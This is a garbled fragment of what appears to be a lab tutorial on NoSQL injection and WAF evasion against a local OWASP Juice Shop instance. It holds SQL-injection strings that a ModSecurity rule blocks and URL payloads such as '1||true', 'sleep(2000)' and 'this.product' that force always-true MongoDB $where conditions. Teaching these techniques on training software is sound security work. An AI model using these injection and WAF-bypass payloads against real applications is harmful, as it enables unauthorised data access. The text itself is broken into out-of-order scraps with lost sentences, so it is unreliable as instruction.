||
, &&
, etc.)
Ex: Owasp Modsecurity SQLi Rule that blocks:
' || 1=1#
' && 1=1#
' /*!||*/ 1=1#
' /*!&&*/ 1=1#
http://localhost:3000/rest/product/1||true/reviews
1||true
with a value that's unique to Juice Shophttp://localhost:3000/rest/product/INJECT_ME/reviews
INJECT_ME
create different responses
1
or 1||true
docker run -p 3000:3000 securingthestack/juice-shop:nosqli-waf-evasion-fundamentals
USER_INPUT
is being compared to some UNKNOWN_VALUE
UNKNOWN_VALUE
, they can force an always true condition while evading the WAF
USER_INPUT
== UNKNOWN_VALUE
==
a valid assumption? Why not >
, etc. (Hint: Substitute a few integer values in INJECT_ME
)
http://localhost:3000/rest/product/INJECT_ME/reviews
==
comparisonUNKNOWN_VALUE
object (Question)http://localhost:3000/rest/product/sleep(2000)/reviews
sleep(2000)
was being evaluated?
http://localhost:3000/rest/product/INJECT_ME/reviews
INJECT_ME
is being evaluated within a Javascript expression that's passed into $where
UNKNOWN_VALUE
, so they can force an always true condition
USER_INPUT
== UNKNOWN_VALUE
$where
context, what object is UNKNOWN_VALUE
?UNKNOWN_VALUE
object (Answer)this
or obj
$where
iterates over all documents within a MongoDb collectionthis
this.address
this
in the comparisonthis.UNKNOWN_VALUE
(Question)http://localhost:3000/rest/product/INJECT_ME/reviews
INJECT_ME
to this.UNKNOWN_PROPERTY
UNKNOWN_PROPERTY
this.UNKNOWN_VALUE
(Answer)http://localhost:3000/rest/product/INJECT_ME/reviews
http://localhost:3000/rest/product/this.product/reviews
INJECT_ME
is a random number that's given to each clientBackend Code
this.product
0 comments
Load more